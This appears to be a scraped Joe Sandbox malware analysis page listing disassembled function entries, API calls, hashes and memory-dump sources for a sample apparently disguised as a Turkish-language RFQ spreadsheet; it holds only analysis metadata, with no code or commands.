Opcode ID: 1078c556bc8497f52fb32c081d2cafef92e4c6b7be788e9fe89aad501ca21634
Instruction ID: ec6b7c47d3230cacf87a9b3f54764fb39ae9cc359ff704e2442f4635c1124a69
Opcode Fuzzy Hash: 1078c556bc8497f52fb32c081d2cafef92e4c6b7be788e9fe89aad501ca21634
Instruction Fuzzy Hash: 2A813370A00B058FD725CF2AD45479ABBF1FF88205F008A2ED48AD7B60DB75E945CB91

Function 03051EC4 Relevance: 1.6, APIs: 1, Instructions: 119
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 03051FE2

Memory Dump Source

Source File: 00000001.00000002.1562043640.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3050000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: abe53fb2aae9471079d6a67d3d3b37d9e3784f2f1f5541eca1784d0c879e5ae9
Instruction ID: e0b6696085a40cc8cc83c5236704e9d6a2f66bb7c3c02a4f89531f963b2e0f21
Opcode Fuzzy Hash: abe53fb2aae9471079d6a67d3d3b37d9e3784f2f1f5541eca1784d0c879e5ae9
Instruction Fuzzy Hash: 8251C3B5D01309DFDF14CF9AD984ADEBBB5BF48310F24812AE819AB211D7759845CF90

Function 03051ED0 Relevance: 1.6, APIs: 1, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 03051FE2

Memory Dump Source

Source File: 00000001.00000002.1562043640.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3050000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 08bc647fe44ee57eaf4069133849ae347b82483857cc12342b14813f370c9995
Instruction ID: 875daf3650508c2aa2ac9e476f15845693625d4aca526da4315d3d00e0862c75
Opcode Fuzzy Hash: 08bc647fe44ee57eaf4069133849ae347b82483857cc12342b14813f370c9995
Instruction Fuzzy Hash: 6541BCB1D01309DFDB14CF9AC884ADEBBB5BF88310F24812AE818AB211D775A845CF90

Function 014E58EC Relevance: 1.6, APIs: 1, Instructions: 99
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 014E59A9

Memory Dump Source

Source File: 00000001.00000002.1561277629.00000000014E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_14e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 0ee26f4a81037669001d35164475ab031517dced1e42ac416a3dd94ef01d718e
Instruction ID: 6c1c1b9267bb1e53019a86933b4dce2d670aef5b4361d6fd4a3f5b05677afe32
Opcode Fuzzy Hash: 0ee26f4a81037669001d35164475ab031517dced1e42ac416a3dd94ef01d718e
Instruction Fuzzy Hash: 3741EEB5C00719CFDB24DFAAC884B8EBBF1BF89704F20816AD408AB251DB716946CF50

Function 03051444 Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 03054561

Memory Dump Source

Source File: 00000001.00000002.1562043640.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3050000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: f0ddbbed04b34e1d57b7cf91ed7a243cf380081698b74ad2d785732f64ab5b29
Instruction ID: 1b7d1cf1ca71739d67de82c7c7a88652784c91298c5187d00d6ba86935b7d94a
Opcode Fuzzy Hash: f0ddbbed04b34e1d57b7cf91ed7a243cf380081698b74ad2d785732f64ab5b29
Instruction Fuzzy Hash: 0B4109B59003099FDB14DF9AC848BABBBF5FB88314F25C459E519AB321D774A841CFA0

Function 014E44B4 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 014E59A9

Memory Dump Source

Source File: 00000001.00000002.1561277629.00000000014E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_14e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 3e11fc73ee36ffc81701d4c4302ffd5195563d2acdab30b524e1169aa1e3d7c7
Instruction ID: c7c9bb64d24ef5cd33f5fd96bddbcc21bfe289be554297555f5f087fcf5c1916
Opcode Fuzzy Hash: 3e11fc73ee36ffc81701d4c4302ffd5195563d2acdab30b524e1169aa1e3d7c7
Instruction Fuzzy Hash: 6741EFB5D00719CFDB24DFAAC884B8EBBF5BF88704F20816AD508AB251DB716945CF90

Function 014ED8E8 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 014ED96F

Memory Dump Source

Source File: 00000001.00000002.1561277629.00000000014E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_14e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: f2103a8ed98039a26a31950a96251ddc107ea2dd8bb7eba1ddbb1f905383c57d
Instruction ID: 5d939a75bbdf29029b0f88657a96f7208f007a348a6d86cfc9137cbe46323090
Opcode Fuzzy Hash: f2103a8ed98039a26a31950a96251ddc107ea2dd8bb7eba1ddbb1f905383c57d
Instruction Fuzzy Hash: 4C21E4B5D002099FDB10CFAAD884ADEFBF9FB48310F14801AE914A3350D374A944CFA1

Function 03059779 Relevance: 1.5, APIs: 1, Instructions: 47
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetTimer.USER32(?,016B6428,?,?), ref: 030597DD

Memory Dump Source

Source File: 00000001.00000002.1562043640.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3050000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID: Timer
String ID:
API String ID: 2870079774-0
Opcode ID: 372285fdb25a6a25f050e8294e8d7190e3bc3756c7a9ebfde540fa65445c4212
Instruction ID: 871e38967627d42d9b422ee9fb0ca19297643c3244d209add0938ae6e0f949e4
Opcode Fuzzy Hash: 372285fdb25a6a25f050e8294e8d7190e3bc3756c7a9ebfde540fa65445c4212
Instruction Fuzzy Hash: 6511E0B5800349DFDB20DF9AD885BDEBBF4FB48310F24841AE918A7250C375A954CFA1

Function 03058F0C Relevance: 1.5, APIs: 1, Instructions: 47
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetTimer.USER32(?,016B6428,?,?), ref: 030597DD

Memory Dump Source

Source File: 00000001.00000002.1562043640.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3050000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID: Timer
String ID:
API String ID: 2870079774-0
Opcode ID: 5a5c0d51559e45f2652ea539a366c595992643154bcad3287889438d39b751bf
Instruction ID: 9e7224279188107db9bb59f133dd3df1665bf92f316ba7d456e5839bb7aa61cb
Opcode Fuzzy Hash: 5a5c0d51559e45f2652ea539a366c595992643154bcad3287889438d39b751bf
Instruction Fuzzy Hash: D911DFB5800349DFDB10DF9AD884BDFBBF8EB48320F10841AE918A7200C375A944CFA1

Function 014EB5F8 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 014EB65E

Memory Dump Source

Source File: 00000001.00000002.1561277629.00000000014E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_14e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 7d16065527dc03ddd748ab08cdeeeaf1e1a182d88029e511a230695666f270d1
Instruction ID: 4d94b80309d417dc356e31b0f21c95212081e4467b4512f506e622064c1f373c
Opcode Fuzzy Hash: 7d16065527dc03ddd748ab08cdeeeaf1e1a182d88029e511a230695666f270d1
Instruction Fuzzy Hash: A11102B5C00249CFDB10CFAAC444BDEFBF4EB88210F10841AD418A7210C375A545CFA1

Function 0785782E Relevance: 1.4, Strings: 1, Instructions: 132
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

., xrefs: 078578BC

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID: .
API String ID: 0-3974621797
Opcode ID: dd28467779f7f3af91a735732d4b1403b2e359e16f835405ddb1e3850cb3aa2a
Instruction ID: 1c25cc2862291582333097311055afced1699bc322bbe1df97b8d913af5b323e
Opcode Fuzzy Hash: dd28467779f7f3af91a735732d4b1403b2e359e16f835405ddb1e3850cb3aa2a
Instruction Fuzzy Hash: 0C51F6B8E193498FCB05CFA8D8545ADBFF2EF8A310F14806AD855E7391DB345902CB65

Function 07857868 Relevance: 1.4, Strings: 1, Instructions: 109COMMON

Download Yara Rule

Strings

., xrefs: 078578BC

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID: .
API String ID: 0-3974621797
Opcode ID: 344b9f75c30bcc84cbddf561d0d11eeecf604c4dadb967ad956e973d792ebaf1
Instruction ID: 85a9734619166e70a3a9af3800adbebb22c2ac0e140aa06a7adaa9db71d944a4
Opcode Fuzzy Hash: 344b9f75c30bcc84cbddf561d0d11eeecf604c4dadb967ad956e973d792ebaf1
Instruction Fuzzy Hash: 6E4180B8E15209DFCB44DFA9D8959AEBBF2FB89300F10802AE916A7350DB355902CF55

Function 07859B1B Relevance: 1.4, Strings: 1, Instructions: 107COMMON

Download Yara Rule

Strings

O, xrefs: 07859B33

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID: O
API String ID: 0-878818188
Opcode ID: ab7fbf92ec4505ee6148c2e5df2f7b46d9bb317fba724e8c27d0845d81637871
Instruction ID: 18961e7265311c133d8bdfce5d5347ba139655ddff5ba9e1c1f6c49a33b23a68
Opcode Fuzzy Hash: ab7fbf92ec4505ee6148c2e5df2f7b46d9bb317fba724e8c27d0845d81637871
Instruction Fuzzy Hash: 2341F5B8E1421DDFDB04DFA8D580AADB7B5FB59314F108069E806AB340CB35AD42DFA5

Function 07857A0B Relevance: 1.3, Strings: 1, Instructions: 98COMMON

Download Yara Rule

Strings

e, xrefs: 078579EB

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID: e
API String ID: 0-4024072794
Opcode ID: 614113ca15ac98c26525a7c4acba6b914ba48a4369c85b5488955e14eea238c6
Instruction ID: b5e8a59483fe7f515f302acff14a78114a7ee2e33a33b44a8f43a91a61863939
Opcode Fuzzy Hash: 614113ca15ac98c26525a7c4acba6b914ba48a4369c85b5488955e14eea238c6
Instruction Fuzzy Hash: 20315DB0D0520ADFDB01DFA8D490AEEBBF5FF4A304F148569D805EB250DB349A45CBA1

Function 078549F9 Relevance: 1.3, Strings: 1, Instructions: 76COMMON

Download Yara Rule

Strings

t, xrefs: 07854A00

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID: t
API String ID: 0-2238339752
Opcode ID: 6a1acbab3acca1308539d3e3d9f07992d511f35555791f8bc82ee192cadaa464
Instruction ID: e1f10aaf96c01037395cac7d4dc994c74229c6a653f014d6f1978ff693a9d49d
Opcode Fuzzy Hash: 6a1acbab3acca1308539d3e3d9f07992d511f35555791f8bc82ee192cadaa464
Instruction Fuzzy Hash: 0E21CCB16093858FC706DF79D8406A9BFE5FF46214F1881AAE809CB353EB35D841CBA1

Function 07858523 Relevance: 1.3, Strings: 1, Instructions: 50COMMON

Download Yara Rule

Strings

&, xrefs: 0785853B

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID: &
API String ID: 0-1010288
Opcode ID: 74facefe9e72e1f24f8135c6be3306be229815a353bbad751ddf90e0fdd3c583
Instruction ID: fcca386233d4d7cdd6bc950e12c148fb481c5ca6f65fd5565b7de9604e496f56
Opcode Fuzzy Hash: 74facefe9e72e1f24f8135c6be3306be229815a353bbad751ddf90e0fdd3c583
Instruction Fuzzy Hash: E60147F0449314ABD714ABACD858ADE3798AB66344F04405BC885C7092CB248804CBD7

Function 078544E7 Relevance: 1.3, Strings: 1, Instructions: 41COMMON

Download Yara Rule

Strings

E, xrefs: 078544AE

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID: E
API String ID: 0-3568589458
Opcode ID: 8497304d879956bbda02e9bf28f89f2a326b4b11e69879d1fb0a608471df785d
Instruction ID: 066f17f529fd6b44498ed2d9368d3e2186e123d69396f85cbed3c86ae91ad967
Opcode Fuzzy Hash: 8497304d879956bbda02e9bf28f89f2a326b4b11e69879d1fb0a608471df785d
Instruction Fuzzy Hash: 57018F319087989ECB52AF78D8440D9BBB0EB52261F00C66BE98DDB412E73191D48B81

Function 078579D3 Relevance: 1.3, Strings: 1, Instructions: 31COMMON

Download Yara Rule

Strings

e, xrefs: 078579EB

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID: e
API String ID: 0-4024072794
Opcode ID: 3bbcdc6ae2ef377de85d4f3dbf81fade1c556a1e38a3ca9d5a97fad73d73f5bc
Instruction ID: 10dbce0ec1b6e8285e45eab560b920853f31e379283f4e2295266d257f449b52
Opcode Fuzzy Hash: 3bbcdc6ae2ef377de85d4f3dbf81fade1c556a1e38a3ca9d5a97fad73d73f5bc
Instruction Fuzzy Hash: FBF0E2F244E24A9FCB01CB78881A6693F289B13204F0890ABEC0597062DA79090593B2

Function 07858528 Relevance: 1.3, Strings: 1, Instructions: 17COMMON

Download Yara Rule

Strings

&, xrefs: 0785853B

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID: &
API String ID: 0-1010288
Opcode ID: 9be0ed315d614ba77475d789dd060f3a7e27ef5a1e0c56c5e45c71fbb39ee302
Instruction ID: e66d7f3fcf1fa8be0dd3f76cd93ad507b2b09d0af645ffcc25980d8bd060d78e
Opcode Fuzzy Hash: 9be0ed315d614ba77475d789dd060f3a7e27ef5a1e0c56c5e45c71fbb39ee302
Instruction Fuzzy Hash: C9D0C7F055B20CD7D711DBA5D515B6A77AC9717308F0054559C05D31609E711940D556

Function 078579D8 Relevance: 1.3, Strings: 1, Instructions: 17COMMON

Download Yara Rule

Strings

e, xrefs: 078579EB

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID: e
API String ID: 0-4024072794
Opcode ID: 0cb1839fdc97cb1bea218e8f3088a5ea07ff2c24f39e5feede773a5765a40564
Instruction ID: ed0969ab5a1fe33ef8fefe28a91758156b0da5e548626fcafa3a0e78e1086ba5
Opcode Fuzzy Hash: 0cb1839fdc97cb1bea218e8f3088a5ea07ff2c24f39e5feede773a5765a40564
Instruction Fuzzy Hash: C4D05EF045A309DBC3009B79D96AB797AB8D707205F009184A80A931509A790A10A666

Function 0785D108 Relevance: 1.3, Strings: 1, Instructions: 14COMMON

Download Yara Rule

Strings

KHT, xrefs: 0785D10B

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID: KHT
API String ID: 0-3609783251
Opcode ID: ee1a745c3297324aee1a5b5321d38255f3df9d1c99cd8f5ee14f43d5517735f2
Instruction ID: 8e58ebe21af45c934a0ae5238d08f6750372619cdf10a9a1f9e888daebda5b7f
Opcode Fuzzy Hash: ee1a745c3297324aee1a5b5321d38255f3df9d1c99cd8f5ee14f43d5517735f2
Instruction Fuzzy Hash: F3D012322502089F4B91EEE5EC80C52BBDCBB34640700C422EE04C7020E623E475EB52

Function 07852700 Relevance: .5, Instructions: 523COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da396afdd3cfbb6f2dd7c89b0b9976834da2efcba46f77be2815efc8960e18a6
Instruction ID: e5024d1949e0047437c8c53b4e1052a7cf624d6f4f035b1abd7bb3fbeb15998e
Opcode Fuzzy Hash: da396afdd3cfbb6f2dd7c89b0b9976834da2efcba46f77be2815efc8960e18a6
Instruction Fuzzy Hash: AB42E270D1061DCFCB15EFA8C8486DCBBB1BF59300F5186A9D5497B264EB30AA99CB81

Function 078526FB Relevance: .5, Instructions: 517COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e45ad19c37640f5503ab036600b070bcaab09c1e1a5e5fd35fa776aa7935cc8
Instruction ID: 444287ee3b5829faba36d8583f3583afa0986b286ef94075ce4e6d179b7dbf1c
Opcode Fuzzy Hash: 6e45ad19c37640f5503ab036600b070bcaab09c1e1a5e5fd35fa776aa7935cc8
Instruction Fuzzy Hash: ED32E270D1061DCFCB15EFA8C8486DCBBB1BF59300F5186A9D5497B264EB309A98CB81

Function 078559CB Relevance: .2, Instructions: 231COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 609b1075374632c592d93e662a69f64896b846eae01c8d0c5b1593b5bea6e76b
Instruction ID: 3b2d83ca3f45fcc989fb64dc9cdaf6a6a07616e5db433656dad458f9de11be17
Opcode Fuzzy Hash: 609b1075374632c592d93e662a69f64896b846eae01c8d0c5b1593b5bea6e76b
Instruction Fuzzy Hash: E1B1F875910619CFCB11EF68C844A9CFBB1FF59314F05C299E949BB211EB30AA99CF90

Function 07852158 Relevance: .2, Instructions: 207COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e885d258d5cbe73ff08db137e1860007e02fcdf937229f6a30bd5ef757f3191
Instruction ID: 78375f07628c9eda7e725fec2a690b8cfcc15cdcbe32da07ffeddba3ffb68b60
Opcode Fuzzy Hash: 2e885d258d5cbe73ff08db137e1860007e02fcdf937229f6a30bd5ef757f3191
Instruction Fuzzy Hash: 058191F0A1020ADFCB11EF68D8886EDBBB1FF55300F114069E856E72A4EF309965CB81

Function 07850BD8 Relevance: .2, Instructions: 207COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 248cddaea05e8c152277add4c5405b2330452b9e6b111c501effa7dc010202ae
Instruction ID: f6b13fad036a828b6225419946a8d5fd7c012f5809912539cbc9b3466fca73aa
Opcode Fuzzy Hash: 248cddaea05e8c152277add4c5405b2330452b9e6b111c501effa7dc010202ae
Instruction Fuzzy Hash: CD5166B0A05209CFDB219FB5D8989ADBFB2FF84300F214569D806BB295CB359861CF41

Function 0785D7D4 Relevance: .2, Instructions: 204COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49b1bff6d5acf4d0ade0ddf5859eac64faa5606b496a9d9d88f6448794aa2f38
Instruction ID: e719f2659bb072b6c33e53f25297190ef2eff5309d9d18f6ff8a09cd8ef47af4
Opcode Fuzzy Hash: 49b1bff6d5acf4d0ade0ddf5859eac64faa5606b496a9d9d88f6448794aa2f38
Instruction Fuzzy Hash: A9A1F3B8A14229CFDB20CF58C884BADB7B9FB59315F108695DC0AAB355C730A985CF60

Function 0785D655 Relevance: .2, Instructions: 184COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb25df9d91033c725eb2fa2b9e582019a0279ce3658528e0bd0c68d1ccc14269
Instruction ID: d37f3cbc24428f8ebe1d981b549dfd9cc94b2c2e5eca32e5d317a14f8273f41f
Opcode Fuzzy Hash: fb25df9d91033c725eb2fa2b9e582019a0279ce3658528e0bd0c68d1ccc14269
Instruction Fuzzy Hash: F481E2B8A05258CFCB65CF64C984AECBBF5BB1A305F1095AAD80EA7351C7319E85CF11

Function 0785214B Relevance: .2, Instructions: 172COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 234382d8d061d2c5da1c407922dd47a2b950101966501c48f0b8247e7268ab9b
Instruction ID: 1447fc76ddb74e30ec9d247c3923801dcb4b67f7d8c3c4cb0a0bfd4daa04fa93
Opcode Fuzzy Hash: 234382d8d061d2c5da1c407922dd47a2b950101966501c48f0b8247e7268ab9b
Instruction Fuzzy Hash: ED51C0F0A1020ADFCB15EF68D8886ECBBB1FF65304F244069D852E72A4EF309955CB80

Function 0785C558 Relevance: .2, Instructions: 163COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86a4ebeea5c83dd65bbabacf08c8410b5254d445fa4801d0cd1bc329f732ecd7
Instruction ID: 06d249e3dbab43a8794e44447e65d7d19dee4ad5b0d85da04283a159dff7fa84
Opcode Fuzzy Hash: 86a4ebeea5c83dd65bbabacf08c8410b5254d445fa4801d0cd1bc329f732ecd7
Instruction Fuzzy Hash: 3251D3B4E1421DCFDB08CFA9C984AADBBF6BF99304F109129D81AAB355DB305906CF50

Function 07850E18 Relevance: .2, Instructions: 159COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bd115ed7f63ba8cbeb59c2019d0e75d7a5c5a2502d674004eac4bb6a39df130
Instruction ID: dc58dac96ff042120aabcee2b141a9b9db472f599aa8f0169f8c9e30e5388f1f
Opcode Fuzzy Hash: 8bd115ed7f63ba8cbeb59c2019d0e75d7a5c5a2502d674004eac4bb6a39df130
Instruction Fuzzy Hash: BA5194B1A0130A8FDB20DFB9C4846AEB7F6EF98351F64097EC90AD7280DB319945CB51

Function 07854540 Relevance: .2, Instructions: 150COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6a644c2b84a5575baad7bf69d6df0ca9b4f607f93b2ed5c0ff0f1bed62d5f0d
Instruction ID: c379c44c25603bd1634e783fe35dde571bb5b1c83b417eb2ebd8e9638b7ca730
Opcode Fuzzy Hash: a6a644c2b84a5575baad7bf69d6df0ca9b4f607f93b2ed5c0ff0f1bed62d5f0d
Instruction Fuzzy Hash: 15514035A10609CFCF00EFA8D8848DDF7B5FF99310F108269D905BB215EB31A959CB90

